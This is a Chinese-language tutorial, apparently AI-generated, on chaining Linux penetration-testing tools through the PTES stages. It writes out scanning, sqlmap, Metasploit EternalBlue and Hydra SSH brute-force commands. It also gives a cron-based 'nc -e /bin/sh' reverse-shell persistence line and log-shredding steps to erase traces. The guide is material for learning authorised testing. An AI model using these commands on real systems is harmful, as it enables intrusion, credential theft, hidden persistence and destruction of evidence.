Linux渗透测试中,工具的组合使用遵循渗透测试的标准流程(如PTES标准),并针对不同阶段选择适配的工具链。
一、信息收集阶段
- 被动侦察
工具组合:theHarvester(收集邮箱/子域名) + Maltego(可视化关联分析)
示例命令:
bash
theharvester -d example.com -b google,linkedin # 从公开源获取目标信息[5](@ref)[8](@ref)
关键点:避免触发目标告警,优先使用公开数据源。
- 主动扫描
工具组合:Nmap(端口/服务探测) + Masscan(快速全网扫描) + Wireshark(流量分析)
示例命令:
bash
nmap -sS -Pn -T4 -sV -O -p 1-1000 --script=vuln 192.168.1.0/24 # SYN扫描+漏洞脚本检测[1](@ref)[6](@ref)
优化技巧:
使用-T4加速扫描,但需平衡速度与隐蔽性 结合--script=vuln调用NSE脚本增强漏洞识别
二、漏洞分析阶段
- 自动化扫描
工具组合:OpenVAS/GVM(全面漏洞评估) + Nikto(Web专项扫描)
操作流程:
bash
gvm-setup # 初始化OpenVAS[8](@ref) nikto -h http://target.com -Tuning x456 # 检测Web服务器漏洞[6](@ref)
注意:OpenVAS需定期同步漏洞库(gvm-feed-update)。
- 手动验证
工具组合:Burp Suite(拦截/重放请求) + sqlmap(SQL注入检测)
示例:
bash
sqlmap -u " http://target.com/login?id=1 " --risk=3 --level=5 # 高阶SQL注入检测[6](@ref)
技巧:
Burp Suite需配置代理(如127.0.0.1:8080)拦截HTTP请求。
三、漏洞利用阶段
- 框架化攻击
工具组合:Metasploit(漏洞利用框架) + Exploit-DB(漏洞库)
典型流程:
bash
msfconsole use
exploit/windows/smb/ms17_010_eternalblue # 永恒之蓝漏洞[8](@ref) set RHOSTS 192.168.1.105 exploit -j # 后台执行
扩展:通过searchsploit快速检索本地漏洞库(如searchsploit dirty cow)。
- 密码攻击
工具组合:Hydra(在线爆破) + John the Ripper(离线破解)
示例:
bash
hydra -L users.txt -P rockyou.txt ssh://192.168.1.1 # SSH爆破[3](@ref)[6](@ref) john --format=sha512crypt shadow.txt # 破解Linux密码哈希[6](@ref)
四、后渗透阶段
- 权限维持
工具组合:Meterpreter(交互式Shell) + Cron(计划任务持久化)
操作示例:
bash
meterpreter > run
post/multi/manage/shell_to_meterpreter # 升级Shell[5](@ref) echo "* * * * * nc -e /bin/sh 192.168.1.2 4444" | crontab - # 定时反向连接[7](@ref)
- 横向移动
工具组合:
Impacket(内网协议利用) + Responder(LLMNR/NBT-NS欺骗)
场景:
通过ntlmrelayx.py转发SMB认证获取域控权限。
五、报告与清理
- 证据整理:
使用Dradis框架记录测试过程与结果。
- 痕迹清除:
删除日志:shred -u /var/log/auth.log 清除Meterpreter会话:clearev命令。
六、工具链组合原则
- 隐蔽性优先:
如用Nmap -T2替代默认-T4降低检测风险。
- 自动化+手动验证:
自动化扫描(OpenVAS)需人工复核(Burp Suite)。
- 合规性:
确保所有操作均在授权范围内。